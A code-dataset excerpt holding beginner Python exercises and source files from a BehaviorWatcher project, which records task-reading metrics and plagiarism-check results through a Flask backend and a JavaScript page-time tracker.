"alphanum_fraction": 0.6511628031730652,
"avg_line_length": 20.5,
"blob_id": "5ab711919eb78d3e6428f23401d0ab089a968a02",
"content_id": "c38f4d9bda69c05fdb2d24130760a0677271d620",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 6,
"path": "/Numbers/Exercises/Exercise_3_8_6b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "x = eval(input('Enter x : '))\ny = eval(input('Enter y : '))\n\nnumerator = abs(x-y)\ndenominator = x+y\nprint(numerator/denominator)\n"
},
{
"alpha_fraction": 0.7421875,
"alphanum_fraction": 0.7578125,
"avg_line_length": 63.5,
"blob_id": "b1a5c066900f075b57339f5947cad2e731b264be",
"content_id": "7bdec9b3865ae349ace7c5a52f1d534493698140",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 128,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 2,
"path": "/Basics/Exercises/Exercise_1_8_7b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "weightInKilograms = eval(input('Enter weight : ')) \nprint('There are',weightInKilograms*2.2,'in',weightInKilograms,'kilograms.')"
},
{
"alpha_fraction": 0.5213675498962402,
"alphanum_fraction": 0.5641025900840759,
"avg_line_length": 18.5,
"blob_id": "1be5f3d3009e088c4c126bf675661d853bc5f7ee",
"content_id": "961b424048e2b2709992becdc1a2ea8c556ab769",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 6,
"path": "/Numbers/Exercises/Exercise_3_8_2b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "from random import randint\nx = randint(1,50)\ny = randint(2,5)\n\nprint('x = ',x,'\\ty = ',y,sep='')\nprint('x^y =',x**y)\n"
},
{
"alpha_fraction": 0.72052401304245,
"alphanum_fraction": 0.7336244583129883,
"avg_line_length": 37.33333206176758,
"blob_id": "17a26491cff2b6280ea62bc110822b427fee582b",
"content_id": "a8fd0585764422de4ece9d98de3c38992eed7b56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 6,
"path": "/Basics/Exercises/Exercise_1_8_9a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "mealPrice = eval(input('Enter Meal Price : '))\ntipPercent = eval(input('Enter Tip Percent : '))\n\ntipAmount = (tipPercent/100)*mealPrice\ntotalPrice = mealPrice + tipAmount\nprint('Final Price =',totalPrice,'Tip Amount =',tipAmount)"
},
{
"alpha_fraction": 0.772455096244812,
"alphanum_fraction": 0.7844311594963074,
"avg_line_length": 54.66666793823242,
"blob_id": "e49f56fcb68df2a0b949e8eb8f857e409ad28aa4",
"content_id": "1c42b9ed7487ad4e001bbf4616a957f1c79968b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 3,
"path": "/Basics/Exercises/Exercise_1_8_7a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "weightInKilograms = eval(input('Enter weight : '))\nweightInPounds = weightInKilograms*2.2\nprint('There are',weightInPounds,'pounds in',weightInKilograms,'kilograms.')\n"
},
{
"alpha_fraction": 0.5178571343421936,
"alphanum_fraction": 0.5892857313156128,
"avg_line_length": 18,
"blob_id": "1631b8c39d8c1124f2fb952da0521fa124f5df64",
"content_id": "3cebc239b878a8e873d87bb80651cab40a0db76e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 3,
"path": "/For Loops/Exercises/Exercise_2_5_3a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "name = 'Lwandile Ganyile'\nfor i in range(100):\n\tprint((i+1), name)"
},
{
"alpha_fraction": 0.5925925970077515,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 17.33333396911621,
"blob_id": "ac82bb7707b09ce8c0ccdf6d67364773d1982259",
"content_id": "70de136c80e5c51c357df809ff10d587d43eb304",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 3,
"path": "/For Loops/Exercises/Exercise_2_5_1b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "name = 'Lwandile '\nfor i in range(10):\n\tprint(name*10)"
},
{
"alpha_fraction": 0.7081339955329895,
"alphanum_fraction": 0.7129186391830444,
"avg_line_length": 25.25,
"blob_id": "eb2035a39b8472760f8fc4cff39195c3607460c1",
"content_id": "800033aad35a3ad81b2c43ef4b5a051de8f6e6cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 8,
"path": "/For Loops/Exercises/Exercise_2_5_8c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "username = input('Enter Your Name : ')\nnumberOfTimes = eval(input('Enter number of times : '))\n\nif numberOfTimes>0:\n\tfor i in range(numberOfTimes):\n\t\tprint(username)\nelse:\n\tprint('Error : Invalid User Input.')"
},
{
"alpha_fraction": 0.5512820482254028,
"alphanum_fraction": 0.6025640964508057,
"avg_line_length": 18.5,
"blob_id": "57af59a4246ff848a45f45df66f3abca949599ef",
"content_id": "2e98e740e1966f7b147f3825c9d9c6911b89f2d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 78,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 4,
"path": "/For Loops/Exercises/Exercise_2_5_2c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(50):\n\tfor j in range(18):\n\t\tprint('Lwandile',end=' ')\n\tprint()\n"
},
{
"alpha_fraction": 0.6646341681480408,
"alphanum_fraction": 0.6829268336296082,
"avg_line_length": 22.428571701049805,
"blob_id": "0cf6dc2e8a8709a605c5e79e96f49b7be63fb793",
"content_id": "28aea8edf4098f35cea0e954a5c2230ba324b1ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 7,
"path": "/Numbers/Exercises/Exercise_3_8_10ab.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "exponent = eval(input('Enter power : '))\nanswer = pow(2,exponent)\ndigit = answer%10\n\nprint('Power =',exponent)\nprint('Number =',answer)\nprint('Last Digit =',digit)\n"
},
{
"alpha_fraction": 0.4583333432674408,
"alphanum_fraction": 0.5208333134651184,
"avg_line_length": 23.5,
"blob_id": "199d68b0897684907bff94d4e3dd3f443f193771",
"content_id": "dbceb74b4ebb582434d2ec47cd317e5712cf3c18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_4b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(1,21):\n\tprint(i, i*i,sep=' --- ')"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 22.66666603088379,
"blob_id": "c8eb6ca25a91e1e2b93d19e56f14a461d85b3c11",
"content_id": "94179d5138b45e2ea9883d312e2cf0fdfb0fbcff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 3,
"path": "/Basics/Exercises/Exercise_1_8_4a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "numerator = 512-282\ndenominator = 47*48+5\nprint(numerator/denominator)"
},
{
"alpha_fraction": 0.649402379989624,
"alphanum_fraction": 0.6693227291107178,
"avg_line_length": 26.88888931274414,
"blob_id": "bb7afa84a8bda0a35551ee97b5e74c75ce8c49e5",
"content_id": "8c05079dd140244ee348cd457b10095a75bb9fcc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 9,
"path": "/Numbers/Exercises/Exercise_3_8_8c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "totalTime = eval(input('Enter number of seconds : '))\nif totalTime>0:\n minutes = totalTime//60\n seconds = totalTime%60\n\n print(minutes,'minute(s)')\n print(seconds,'second(s)',)\nelse:\n print(totalTime,'is an invalid number of seconds.')\n"
},
{
"alpha_fraction": 0.624365508556366,
"alphanum_fraction": 0.6446700692176819,
"avg_line_length": 38.400001525878906,
"blob_id": "05c77cb31693514052fdf14279e194dad60f192a",
"content_id": "b3dc2f579ac59bee5491294b942070aa1b8b9f60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 5,
"path": "/For Loops/Exercises/Exercise_2_5_4c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "# Imagine we wanted to to display a --- a^n, where n is an real numbers.\n# Ofcouse a*a*a*a*a*...*a would be tedious and combusome.\nimport math\nfor i in range(1,21):\n\tprint(i, pow(i,2),sep=' --- ')\n"
},
{
"alpha_fraction": 0.5405405163764954,
"alphanum_fraction": 0.6216216087341309,
"avg_line_length": 18,
"blob_id": "f0894cf3ff9236f64133344b55a60f4c91886986",
"content_id": "08e186550fed395af5d725371e94a1d9b4e613ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 37,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_1a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(100):\n\tprint('Lwandile Ganyile')"
},
{
"alpha_fraction": 0.7111913561820984,
"alphanum_fraction": 0.7220216393470764,
"avg_line_length": 33.625,
"blob_id": "69208c67711c0f3fbd97ef6c57f3c2139238375b",
"content_id": "7c9e49a39859b1173924d018391e0aecb340dc59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 8,
"path": "/Numbers/Exercises/Exercise_3_8_10ca.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "power = eval(input('Enter power : '))\nnumber = 2**power\nnumberOfLastDigits = eval(input('Enter number of last digits : '))\n\nlastDigits = number%(pow(10,numberOfLastDigits))\nprint('Power =',power)\nprint('Number =',number)\nprint('Last',numberOfLastDigits,'digit(s)' ,lastDigits)\n"
}
] | 35 |
evigore/BehaviorWatcher
|
https://github.com/evigore/BehaviorWatcher
|
b5a06ac4b3143f18c1f972e75f3f9f614bebeddc
|
5ec45688d58f57c2b9e23dab82db0b5c694d0b40
|
65a19bca3150ef6348e2209ecf8a71b9fa852bda
|
refs/heads/main
| 2023-08-02T06:25:59.901214 | 2021-10-02T15:40:47 | 2021-10-02T15:40:47 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7379310131072998,
"alphanum_fraction": 0.7379310131072998,
"avg_line_length": 25.363636016845703,
"blob_id": "150d80cbd6b69d51d50b391a20fe5524b8f9751f",
"content_id": "ef73dfe179bac3bad1c65c5f3766f7b11c150b22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 22,
"path": "/backend/server.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "import os\nimport connexion\nimport thirdparty\n\nconnex_app = connexion.FlaskApp(__name__, specification_dir='./')\napp = connex_app.app\n\n# Configure the SqlAlchemy part of the app instance\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = 'sqlite:///behaviorWatcher.db'\napp.config[\"SQLALCHEMY_ECHO\"] = True\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\nthirdparty.db.init_app(app)\nthirdparty.ma.init_app(app)\n\nconnex_app.add_api('./swagger.yaml')\n\nwith app.app_context():\n if not os.path.exists(\"behaviorWatcher.db\"):\n thirdparty.db.create_all()\n\nconnex_app.run(debug=False)\n"
},
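server.py wires a Connexion app to the routes declared in swagger.yaml and an SQLite database. Assuming the default Flask port 5000 (as exposed in docker-compose.yml) and the /api/metrics route documented in metrics_controller.py, a client call might look like this sketch:

```python
# Hypothetical client call; the payload keys mirror the Metric model.
import requests

resp = requests.post(
    "http://localhost:5000/api/metrics",
    json={"user_id": 1, "task_id": 2, "reading_time": 30,
          "task_viewed": True, "task_copied": False},
)
print(resp.status_code, resp.json())
```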
{
"alpha_fraction": 0.6434599161148071,
"alphanum_fraction": 0.6455696225166321,
"avg_line_length": 25.33333396911621,
"blob_id": "f59c341caf0bf5bee4a27e94a7aa34d78f8032c7",
"content_id": "5c139498ef4db1127dc515dcf5efa1e17919de03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 18,
"path": "/backend/thirdparty/__init__.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "from flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nfrom datetime import datetime\n\ndb = SQLAlchemy()\nma = Marshmallow()\n\ndef fetch(result):\n tmp = []\n\n for i in result:\n solution = {key: value for key, value in i.items()}\n if 'CreatedAt' in solution:\n solution['CreatedAt'] = datetime.strptime(solution['CreatedAt'].split('.')[0], '%Y-%m-%d %H:%M:%S') # TODO: remove\n\n tmp.append(solution)\n\n return tmp\n"
},
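The fetch() helper flattens raw result rows into plain dicts and re-parses the 'CreatedAt' column into a datetime. A hypothetical usage fragment (table and column names taken from the queries in verifications_controller.py; it would need to run inside an application context):

```python
from thirdparty import db, fetch

# Raw rows in, plain dicts out, with 'CreatedAt' promoted to datetime.
rows = db.engine.execute("SELECT OwnerId, CreatedAt FROM Solution")
for solution in fetch(rows):
    print(solution["OwnerId"], solution["CreatedAt"])
```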
{
"alpha_fraction": 0.6109631657600403,
"alphanum_fraction": 0.6240568161010742,
"avg_line_length": 29.863014221191406,
"blob_id": "72c414d0419da4ca841958d56b177ac43f9b496f",
"content_id": "496f7e7283af1bde13237a4b0e29051f70e0cb84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4506,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 146,
"path": "/backend/metrics_controller.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "\"\"\"\nHTTP handlers for /metrics route\n\"\"\"\n\nfrom thirdparty import db\nfrom models import (\n Error,\n ErrorSchema,\n Metric,\n MetricSchema,\n)\n\nerrorSchema = ErrorSchema()\nmetricSchema = MetricSchema()\nmetricsSchema = MetricSchema(many=True)\n\n\ndef get(user_id=None, task_id=None):\n \"\"\"\n Respond to a GET request for /api/metrics\n\n :return json array of metrics\n \"\"\"\n try:\n if user_id is None and task_id is None:\n metrics = Metric.query.all()\n return metricsSchema.dump(metrics), 200\n\n if user_id is None:\n metrics = Metric.query.filter(Metric.task_id == task_id).all()\n return metricsSchema.dump(metrics), 200\n\n if task_id is None:\n metrics = Metric.query.filter(Metric.user_id == user_id).all()\n return metricsSchema.dump(metrics), 200\n\n metrics = Metric.query.filter(Metric.user_id.like(user_id) & Metric.task_id.like(task_id)).all()\n return metricsSchema.dump(metrics), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error('Unexpected error')), 500\n\n\ndef post(body):\n \"\"\"\n Respond to a POST request for /api/metrics\n Creates new metric with metric data, assigns metric.id\n \"\"\"\n\n try:\n result = Metric.query.filter(\n Metric.user_id.like(body.get('user_id')) & Metric.task_id.like(body.get('task_id'))).one_or_none()\n if result is not None:\n return patch(result.id, body)\n # return errorSchema.dump(Error(f\"Metric with user_id={Body['user_id']} and task_id={Body['task_id']} already exists.\")), 400\n\n metric = Metric(**body)\n db.session.add(metric)\n db.session.commit()\n\n return get_one(metric.id)[0]\n except TypeError as e:\n return errorSchema.dump(Error(str(e))), 400\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef get_one(metric_id):\n \"\"\"\n Respond to a GET request for /api/metrics/{metricId}\n Returns specified metric\n\n :param metric_id Id of the metric to read\n :return metric on success or 404\n \"\"\"\n\n try:\n metric = Metric.query.filter(Metric.id.like(metric_id)).one_or_none()\n if metric is None:\n return errorSchema.dump(Error(f\"Metric with metricId={metric_id} does not exists\")), 400\n\n return metricSchema.dump(metric), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef patch(metric_id, body):\n \"\"\"\n Respond to a PATCH request for /api/metrics/{metricId}\n Patches the metric with the properties of Body or leaves unchanged\n\n :param metric_id Id of the metric to update\n :param body\t\t Data to update the metric with\n \"\"\"\n\n try:\n metric = Metric.query.filter(Metric.id.like(metric_id)).one_or_none()\n if metric is None:\n return errorSchema.dump(Error(f\"Metric with metricId: {metric_id} does not exists\")), 400\n\n metric.user_id = body.get('user_id')\n metric.task_id = body.get('task_id')\n\n if body.get('reading_time') is not None:\n metric.reading_time += max(0, int(body.get('reading_time')))\n\n if body.get('task_viewed') is not None:\n metric.task_viewed = metric.task_viewed or bool(body.get('task_viewed'))\n\n if body.get('task_copied') is not None:\n metric.task_copied = metric.task_copied or bool(body.get('task_copied'))\n\n db.session.add(metric)\n db.session.commit()\n\n return metricSchema.dump(metric), 200\n except db.exc.IntegrityError:\n return errorSchema.dump(\n Error(f\"Metric with user_id={metric.user_id} and task_id={metric.task_id} already exists\")), 400\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 
500\n\n\ndef delete(metric_id):\n \"\"\"\n Respond to a DELETE request for /api/metrics/{metricId}\n Deletes the metric\n\n :param metric_id Id of the metric to update\n \"\"\"\n\n try:\n metric = Metric.query.filter(Metric.id.like(metric_id)).one_or_none()\n if metric is None:\n return errorSchema.dump(Error(f\"Metric with id {metric_id} not found\")), 400\n\n db.session.delete(metric)\n db.session.commit()\n\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n"
},
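The PATCH handler above merges rather than overwrites: reading_time accumulates (with negative deltas clamped to zero) and the two booleans are OR-ed, so they can only ever flip from False to True. The merge rule in isolation:

```python
# PATCH semantics in miniature: additive time, sticky flags.
reading_time, task_viewed = 40, False
update = {"reading_time": 15, "task_viewed": True}

reading_time += max(0, int(update["reading_time"]))
task_viewed = task_viewed or bool(update["task_viewed"])
print(reading_time, task_viewed)  # 55 True
```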
{
"alpha_fraction": 0.5194312930107117,
"alphanum_fraction": 0.5930941104888916,
"avg_line_length": 36.67856979370117,
"blob_id": "e07ecdec5a4ce47426e27a83b9a8335a45b613cb",
"content_id": "a563d5de64db91f79fae460ac951a7d3f2b3f51a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7525,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 196,
"path": "/backend/verifications_controller.py",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "\"\"\"\nHTTP handlers for /verification route\n\"\"\"\nimport json\nimport filter\nimport metrics\n\nfrom flask import jsonify\nfrom thirdparty import db, fetch\nfrom models import (Metric, Verification, Error, VerificationSchema, ErrorSchema)\n\nerrorSchema = ErrorSchema()\nverificationSchema = VerificationSchema()\n\napiResponse = \"\"\"{\n \"Version\": \"1\",\n \"SolutionID\": \"original.py\",\n \"MaxSimilarity\": 0.9806427276796765,\n \"MaxSimilaritySolutionID\": \"different_comments.py\",\n \"Verdict\": \"CLEAR POSITIVE\",\n \"Scores\": [\n {\n \"SolutionID\": \"different_comments.py\",\n \"TotalScore\": 0.9806427276796765,\n \"TextBasedScore\": 1,\n \"TokenBasedScore\": 0.9955476522445679,\n \"MetricBasedScore\": 0.9444444444444444,\n \"BinaryBasedScore\": 0.9825788140296936,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"reformatted.py\",\n \"TotalScore\": 0.971757612294621,\n \"TextBasedScore\": 0.9889094233512878,\n \"TokenBasedScore\": 0.9714533090591431,\n \"MetricBasedScore\": 0.9444444444444444,\n \"BinaryBasedScore\": 0.9822232723236084,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"renamed_variables.py\",\n \"TotalScore\": 0.9180482551455498,\n \"TextBasedScore\": 0.7295423150062561,\n \"TokenBasedScore\": 1,\n \"MetricBasedScore\": 1,\n \"BinaryBasedScore\": 0.942650705575943,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"reordered.py\",\n \"TotalScore\": 0.9036459699273109,\n \"TextBasedScore\": 0.8485981523990631,\n \"TokenBasedScore\": 0.9040516316890717,\n \"MetricBasedScore\": 1,\n \"BinaryBasedScore\": 0.861934095621109,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"with_additional_imports.py\",\n \"TotalScore\": 0.8646872325075997,\n \"TextBasedScore\": 0.8857616186141968,\n \"TokenBasedScore\": 0.9573742747306824,\n \"MetricBasedScore\": 0.8888888888888888,\n \"BinaryBasedScore\": 0.7267241477966309,\n \"TreeBasedScore\": null\n },\n {\n \"SolutionID\": \"with_functions.py\",\n \"TotalScore\": 0.5494582574400637,\n \"TextBasedScore\": 0.4490084946155548,\n \"TokenBasedScore\": 0.679684579372406,\n \"MetricBasedScore\": 0.7222222222222222,\n \"BinaryBasedScore\": 0.3469177335500717,\n \"TreeBasedScore\": null\n }\n ]\n}\"\"\"\n\n\ndef get_one(solution_id):\n try:\n # get user id and task id\n verification = Verification.query.filter(\n Verification.destination_solution_id.like(solution_id) & Verification.verdict_of_human.is_(True)).first()\n user_id = None\n task_id = None\n if verification is not None:\n user_id = verification.destination_user_id\n task_id = verification.task_id\n\n # get user rating\n rating = metrics.get_user_rating(user_id) if verification else None\n\n # get task_copied, task_viewed and reading_time\n metric = Metric.query.filter(Metric.user_id.like(user_id) & Metric.task_id.like(task_id)).one_or_none()\n reading_time = metric.reading_time\n task_copied = False\n task_viewed = False\n if metric:\n task_copied = metric.task_viewed\n task_viewed = metric.task_copied\n\n # time reading + number of attempts\n solutions = fetch(db.engine.execute(\n \"SELECT OwnerId, COUNT(OwnerId) AS attempts FROM Solution WHERE TestTaskId='ff1636d5-0aab-479c-9aa2-b14271d8cdf2' GROUP BY OwnerId ORDER BY attempts\",\n {\n # 'task_id': target_solution['TestTaskId'] # TODO: change to real task id\n }))\n user_id = 'e7c8a6c6-b73c-4179-8cb0-45bfcfea9ca5' # TODO: delete\n average_attempts = 0\n user_attempts = 0\n for solution in solutions:\n average_attempts += solution['attempts']\n if solution['OwnerId'] == user_id:\n 
user_attempts = solution['attempts']\n average_attempts /= len(solutions)\n\n time_and_attempts = ''\n if reading_time < 3:\n time_and_attempts = 'Пользователь не читал задание'\n elif user_attempts < average_attempts:\n time_and_attempts = 'Пользователь решил задание за меньше среднего количества попыток'\n elif user_attempts >= average_attempts:\n time_and_attempts = 'Пользователь решил задание за больше среднего количества попыток'\n\n # order of solution\n # solutions = fetch(db.engine.execute(\"SELECT OwnerId, CreatedAt FROM Solution WHERE TestTaskId='ff1636d5-0aab-479c-9aa2-b14271d8cdf2' AND FailedTest IS NULL GROUP BY OwnerId\", {\n ##'task_id': target_solution['TestTaskId'] # TODO: change to real task id\n # }))\n # solutions.sort(reverse=True, key=lambda i: i['CreatedAt'])\n # print(solutions[0], solutions[1])\n\n report = {\n 'rating': rating,\n 'task_viewed': task_viewed,\n 'task_copied': task_copied,\n 'time_and_attempts': time_and_attempts\n }\n\n return jsonify(report), 200\n except Exception as e:\n print(str(e))\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef post(solution_id):\n try:\n # 1. Get solution entity with userId, task, etc from other DB\n solution_id = 1\n\n # 2. filter users (filter.py)\n filter(solution_id)\n\n # 3. call API of other module\n response = json.loads(apiResponse) # apiResponse = request(...) # TODO: real request\n\n for i in response['Scores']:\n verification = Verification(**{\n 'source_solution_id': i['SolutionID'],\n 'destination_solution_id': solution_id,\n 'source_user_id': 4, # TODO: change to real id\n 'destination_user_id': 6, # TODO: change to real id\n 'task_id': 59, # TODO: change to real id\n 'verdict_of_module': response['Verdict'],\n 'total_score': i['TotalScore'],\n 'text_based_score': i['TextBasedScore'],\n 'token_based_score': i['TokenBasedScore'],\n 'metric_based_score': i['MetricBasedScore'],\n 'binary_based_score': i['BinaryBasedScore'],\n 'tree_based_score': i['TreeBasedScore']\n })\n\n db.session.add(verification)\n\n # 4. save result to our DB (especially to Verification TABLE)\n db.session.commit()\n\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(str(e)) # TODO: delete\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n\n\ndef patch(solution_id, body):\n try:\n if body.get('is_plagiarism'):\n Verification.query.filter(Verification.destination_solution_id == solution_id).update(\n {Verification.verdict_of_human: True})\n else:\n Verification.query.filter(Verification.destination_solution_id == solution_id).delete()\n\n db.session.commit()\n return errorSchema.dump(Error(\"OK\")), 200\n except Exception as e:\n print(e)\n return errorSchema.dump(Error(\"Unexpected error\")), 500\n"
},
{
"alpha_fraction": 0.6980661153793335,
"alphanum_fraction": 0.7045539617538452,
"avg_line_length": 27.727598190307617,
"blob_id": "73f39ff289480c76519215e390d5ad313f7921b5",
"content_id": "39172b65e5a734b1901562746aae223264e56c2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 8015,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 279,
"path": "/frontend/js/watcher_with_pages.js",
"repo_name": "evigore/BehaviorWatcher",
"src_encoding": "UTF-8",
"text": "class Watcher {\n\tconstructor(host, options) {\n\t\tthis.startStopTimes = {};\n\t\tthis.idleTimeoutMs = 30 * 1000;\n\t\tthis.currentIdleTimeMs = 0;\n\t\tthis.checkIdleStateRateMs = 250;\n\t\tthis.isUserCurrentlyOnPage = true;\n\t\tthis.isUserCurrentlyIdle = false;\n\t\tthis.currentPageName = \"default-page-name\";\n\t\tthis.timeElapsedCallbacks = [];\n\t\tthis.userLeftCallbacks = []\n\t\tthis.userReturnCallbacks = [];\n\t\tthis.initialStartTime = undefined;\n\n\t\tlet trackWhenUserLeavesPage = true;\n\t\tlet trackWhenUserGoesIdle = true;\n\n\t\tif (options) {\n\t\t\tthis.idleTimeoutMs = options.idleTimeoutInSeconds*1000 || this.idleTimeoutMs;\n\t\t\tthis.currentPageName = options.currentPageName || this.currentPageName;\n\t\t\tthis.initialStartTime = options.initialStartTime;\n\n\t\t\tif (options.trackWhenUserLeavesPage === false)\n\t\t\t\ttrackWhenUserLeavesPage = false;\n\n\t\t\tif (options.trackWhenUserGoesIdle === false)\n\t\t\t\ttrackWhenUserGoesIdle = false;\n\t\t}\n\n\t\tthis.setUpConnection(host);\n\n\t\tthis.setIdleDurationInSeconds(this.idleTimeoutMs / 1000);\n\t\tthis.setCurrentPageName(this.currentPageName);\n\t\tthis.listenEvents(trackWhenUserLeavesPage, trackWhenUserGoesIdle);\n\n\t\tthis.startTimer(this.currentPageName, this.initialStartTime);\n\t}\n\n\tstartTimer(pageName, startTime) {\n\t\tif (!pageName)\n\t\t\tpageName = this.currentPageName;\n\n\t\tif (this.startStopTimes[pageName] === undefined)\n\t\t\tthis.startStopTimes[pageName] = [];\n\t\telse {\n\t\t\tlet arrayOfTimes = this.startStopTimes[pageName];\n\t\t\tlet latestStartStopEntry = arrayOfTimes[arrayOfTimes.length - 1];\n\t\t\tif (latestStartStopEntry !== undefined && latestStartStopEntry.stopTime === undefined)\n\t\t\t\treturn;\n\t\t}\n\n\t\tthis.startStopTimes[pageName].push({\n\t\t\t\"startTime\": startTime || new Date(),\n\t\t\t\"stopTime\": undefined\n\t\t});\n\t}\n\n\tstopAllTimers() {\n\t\tlet pageNames = Object.keys(this.startStopTimes);\n\t\tfor (let i = 0; i < pageNames.length; i++)\n\t\t\tthis.stopTimer(pageNames[i]);\n\t}\n\n\tstopTimer(pageName, stopTime) {\n\t\tif (!pageName) \n\t\t\tpageName = this.currentPageName;\n\n\t\tlet arrayOfTimes = this.startStopTimes[pageName];\n\t\tif (arrayOfTimes === undefined || arrayOfTimes.length === 0)\n\t\t\treturn;\n\n\t\tif (arrayOfTimes[arrayOfTimes.length - 1].stopTime === undefined)\n\t\t\tarrayOfTimes[arrayOfTimes.length - 1].stopTime = stopTime || new Date();\n\t}\n\n\tgetTimeOnPageInSeconds(pageName) {\n\t\tlet timeInMs = this.getTimeOnPageInMilliseconds(pageName);\n\t\tif (timeInMs === undefined)\n\t\t\treturn 